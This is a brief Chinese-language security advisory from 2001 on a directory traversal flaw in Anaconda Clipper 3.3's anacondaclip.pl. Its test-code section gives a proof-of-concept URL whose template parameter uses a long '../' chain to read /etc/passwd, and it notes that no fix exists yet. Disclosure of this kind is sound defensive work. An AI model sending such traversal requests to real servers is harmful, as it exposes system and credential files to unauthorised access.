Anaconda Clipper存在目录遍历漏洞发布时间:2001-03-30 更新时间:2001-03-29 严重程度:中 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Anaconda Clipper 3.3详细描述 Anaconda的Clipper是一个新闻头条收集工具,其中存在一个目录遍 历漏洞,通过请求'/../'的URL,会导致攻击者获得任意文件。 测试代码 http://www.target.com/cgi-bin/anacondaclip.pl?template=../../../../../../../../../../ ../../../../../../../../etc/passwd 解决方案 尚无 相关信息 |
